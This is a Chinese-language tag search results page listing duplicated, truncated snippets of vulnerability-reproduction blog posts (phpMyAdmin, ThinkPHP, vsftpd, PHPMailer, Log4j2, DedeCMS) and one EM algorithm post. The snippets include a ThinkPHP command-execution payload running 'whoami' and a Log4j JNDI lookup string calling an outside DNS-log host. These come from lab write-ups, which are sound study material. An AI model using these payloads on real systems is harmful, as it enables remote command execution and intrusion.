搜索结果
查询Tags标签: 复现,共有 84条记录-
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
Phpmyadmin setup漏洞复现 漏洞描述影响版本漏洞复现漏洞修复漏洞描述 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代…
2022/1/4 12:07:18 人评论 次浏览 -
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
Phpmyadmin setup漏洞复现 漏洞描述影响版本漏洞复现漏洞修复漏洞描述 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代…
2022/1/4 12:07:18 人评论 次浏览 -
thinkphp漏洞复现
0x00:总述 在版本小于5.0.13,不开启debug的情况下 会通过变量覆盖修改$request类的变量的值通过bindParams中的param函数进行任意函数调用 _method=__construct&method=get&filter=system&s=whoami在版本小于5.0.13,开启debug的情况下会执行命令两次 一次在…
2021/12/30 14:08:27 人评论 次浏览 -
thinkphp漏洞复现
0x00:总述 在版本小于5.0.13,不开启debug的情况下 会通过变量覆盖修改$request类的变量的值通过bindParams中的param函数进行任意函数调用 _method=__construct&method=get&filter=system&s=whoami在版本小于5.0.13,开启debug的情况下会执行命令两次 一次在…
2021/12/30 14:08:27 人评论 次浏览 -
第8节:EM算法及numpy复现
文章目录 EM期望极大算法(expectation maximization algorithm)numpy复现EM期望极大算法(expectation maximization algorithm) 用于含有隐变量 (hidden variable)的概率模型参数的极大似然估计,或极大后验概率估计。EM算法的每 次迭代由两步组成: E步,求期望(e…
2021/12/23 11:07:07 人评论 次浏览 -
第8节:EM算法及numpy复现
文章目录 EM期望极大算法(expectation maximization algorithm)numpy复现EM期望极大算法(expectation maximization algorithm) 用于含有隐变量 (hidden variable)的概率模型参数的极大似然估计,或极大后验概率估计。EM算法的每 次迭代由两步组成: E步,求期望(e…
2021/12/23 11:07:07 人评论 次浏览 -
网络渗透测试作业:笑脸漏洞复现
笑脸漏洞复现 工具: 攻击机:kali 192.168.79.128 靶机:Metasplotable2-Linux 192.168.79.131复现过程 打开 kali 终端,执行以下命令:nmap 主机IP/24发现靶机 (192.168.118.131) 打开着 21 端口 输入命令:nmap -sV 靶机IP可以看到靶机的ftp服务的版本信息是vsftpd …
2021/12/14 6:21:49 人评论 次浏览 -
网络渗透测试作业:笑脸漏洞复现
笑脸漏洞复现 工具: 攻击机:kali 192.168.79.128 靶机:Metasplotable2-Linux 192.168.79.131复现过程 打开 kali 终端,执行以下命令:nmap 主机IP/24发现靶机 (192.168.118.131) 打开着 21 端口 输入命令:nmap -sV 靶机IP可以看到靶机的ftp服务的版本信息是vsftpd …
2021/12/14 6:21:49 人评论 次浏览 -
PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远…
2021/12/13 14:19:13 人评论 次浏览 -
PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远…
2021/12/13 14:19:13 人评论 次浏览 -
Log4j2远程命令执行复现
Log4j2远程命令执行复现Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell一、漏洞环境 环境是http://vulfocus.fofa.so平台的二、漏洞验证 启动环境后访问 抓包,修改请求为post在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslo…
2021/12/12 23:20:01 人评论 次浏览 -
Log4j2远程命令执行复现
Log4j2远程命令执行复现Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell一、漏洞环境 环境是http://vulfocus.fofa.so平台的二、漏洞验证 启动环境后访问 抓包,修改请求为post在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslo…
2021/12/12 23:20:01 人评论 次浏览 -
织梦复现任务
主题:【复现任务】织梦CMS前台任意用户密码修改漏洞 漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面…
2021/12/11 23:17:28 人评论 次浏览 -
织梦复现任务
主题:【复现任务】织梦CMS前台任意用户密码修改漏洞 漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面…
2021/12/11 23:17:28 人评论 次浏览 -
Log4j 漏洞复现
pom.xml 中:<dependencies><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.…
2021/12/11 6:19:29 人评论 次浏览
